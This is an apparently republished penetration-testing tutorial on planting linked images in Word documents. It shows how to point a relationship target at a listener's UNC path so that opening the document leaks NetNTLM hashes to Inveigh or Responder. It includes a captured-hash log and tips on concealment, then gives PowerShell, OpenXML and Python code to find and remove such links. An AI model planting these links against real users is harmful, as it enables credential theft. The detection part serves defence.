How to use image links in Microsoft Word for UNC path injection in penetration testing

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article explains how image links in Microsoft Word can be used for UNC path injection during a penetration test, and then shows how to enumerate and remove such links from a document.

Word documents are often used by attackers to carry out all kinds of intrusions. In web application penetration tests and red team engagements, Word documents can also be used to capture NetNTLM hashes or to demonstrate problems such as lax egress filtering. Not long ago, netbiosX published a blog post about capturing NetNTLM hashes through a frameset. The core idea here is the same, but the method is different: the picture is inserted through a link.

The following tools will be used:

Burp Suite Pro (collaborator client)

Inveigh

Responder (grab hash)

7zip (extract document files)

Image link

First open the Insert tab on the menu bar and click the Picture icon. The Explorer window pops up. Enter the malicious URL in the file name field, then open the "Insert" drop-down menu and select "Link to File". This inserts a link to Burp Collaborator.

If your malicious document is for red teams or social engineering projects, you can also use the Layout option to resize the image to improve its concealment.

Make sure that you have saved your changes to the document. Now whenever you open this document, Microsoft Word tries to resolve the image links in the document. These requests will be logged in the Burp Collaborator client.

Grabbing NetNTLM Hash by UNC path injection

Again, the method used here is the same as netbiosX's: 7zip extracts the files contained in the Word document. The file to modify is document.xml.rels under your_word_doc.docx\word\_rels\. This file contains a series of relationships, each with a target, and all that is needed is to set the relevant Target value to the UNC path of the listening host.

Save the file and copy it back into the Word document using 7zip.

Once the user opens the Word document, Inveigh or Responder will capture the incoming authentication request.

    PS C:\> Invoke-Inveigh -NBNS N -LLMNR N -ConsoleOutput Y -IP 192.168.0.2
    Inveigh 1.3.1 started at 2017-12-19T17:22:26
    Elevated Privilege Mode = Enabled
    WARNING: Windows Firewall = Enabled
    Primary IP Address = 192.168.0.2
    LLMNR Spoofer = Disabled
    mDNS Spoofer = Disabled
    NBNS Spoofer = Disabled
    SMB Capture = Enabled
    WARNING: HTTP Capture Disabled Due To In Use Port 80
    HTTPS Capture = Disabled
    Machine Account Capture = Disabled
    Real Time ConsoleOutput = Enabled
    Real Time File Output = Disabled
    WARNING: Run Stop-Inveigh to Stop Inveigh
    Press any key to stop real time console output
    2017-12-19T17:23:19 SMB NTLMv2 challenge/response captured from 192.168.0.3 (DESKTOP-2QRDJR2):
    Administrator::DESKTOP-2QRDJR2:57 [TRUNCATED] cb: 091 [truncated] 5BC: 010 [truncated] 02E0032002E00310038003200000000000000000000000000

One of the main advantages of this method is that it is very stealthy. Once the document is opened, the request is made without showing the user the URL or UNC path and without any warning that it may be malicious.

Use PowerShell to enumerate relationship targets

The method used above is simple, but very effective because it takes advantage of trusted features in Microsoft Office. Next, I'll introduce two simple ways to enumerate relationship targets without using 7zip. Of course, there are many excellent forensics tools that can accomplish these tasks, such as Yara.

The Word.Application COM object can be used to access the contents of a Word document. This can be done with a few simple commands. The WordOpenXML property contains the relationships in the document.

    $file = "C:\path\to\doc.docx"
    # Starts a Word process and opens the document
    $word = New-Object -ComObject Word.Application
    $doc = $word.Documents.Open($file)
    # WordOpenXML is a string; load it into an XML document before walking it
    $xml = New-Object System.Xml.XmlDocument
    $xml.LoadXml($doc.WordOpenXML)
    $targets = $xml.package.part.xmlData.Relationships.Relationship
    $targets | Format-Table
    $word.Quit()

This enumerates all relationship targets in the document. The problem is that using the Word.Application COM object starts the Word process, and the URL/UNC path is resolved.

To avoid this, we can use the DocumentFormat.OpenXML library and enumerate all external relationships in the document. When this method was used in testing, no Collaborator requests or authentication requests were captured.

    # Load the Open XML SDK assembly; Word itself is not started
    [System.Reflection.Assembly]::LoadFrom("C:\DocumentFormat.OpenXml.dll")
    $file = "C:\path\to\doc.docx"
    # $true opens the package as editable
    $doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]::Open($file, $true)
    $targets = $doc.MainDocumentPart.ExternalRelationships
    $targets
    $doc.Close()

Further, the DeleteExternalRelationship method removes the relationship to an external URL when given its relationship id.

    $doc.MainDocumentPart.DeleteExternalRelationship("rId4")
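The same enumeration can be done for triage without Word or the OpenXML SDK by reading the .rels parts directly from the ZIP container. The following is an added example, not part of the original article; the function names are hypothetical and the sample document, with its 192.0.2.10 target, is constructed for the demonstration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG = "{http://schemas.openxmlformats.org/package/2006/relationships}"
DOC = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

def is_unc(target):
    # UNC path, or a file: URL that names a remote host (file:///C:/... is local).
    t = target.replace("/", "\\").lower()
    if t.startswith("file:"):
        rest = t[5:]
        slashes = len(rest) - len(rest.lstrip("\\"))
        return slashes == 2 or slashes >= 4
    return t.startswith("\\\\")

def external_relationships(docx_bytes):
    # Read every .rels part straight from the ZIP. Word is never started,
    # so no target is resolved and no authentication request is sent.
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(z.read(name)).iter(PKG + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                found.append({"part": name, "id": rel.get("Id"),
                              "type": rel.get("Type", "").rsplit("/", 1)[-1],
                              "target": target, "unc": is_unc(target)})
    return found

def build_sample():
    # Constructed sample: a ZIP holding only the relationships part.
    rel = '<Relationship Id="%s" Type="' + DOC + '%s" Target="%s"%s/>'
    ext = ' TargetMode="External"'
    body = (rel % ("rId1", "styles", "styles.xml", "")
            + rel % ("rId4", "image", r"\\192.0.2.10\share\logo.png", ext)
            + rel % ("rId5", "hyperlink", "https://example.com/", ext))
    rels = '<Relationships xmlns="%s">%s</Relationships>' % (PKG[1:-1], body)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    for r in external_relationships(build_sample()):
        print(("UNC  " if r["unc"] else "     ") + r["id"], r["type"], r["target"])
```

An external image relationship whose target is a UNC path is the pattern described in this article, and the reported id is the value to pass to DeleteExternalRelationship.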

© 2024 shulou.com SLNews company. All rights reserved.
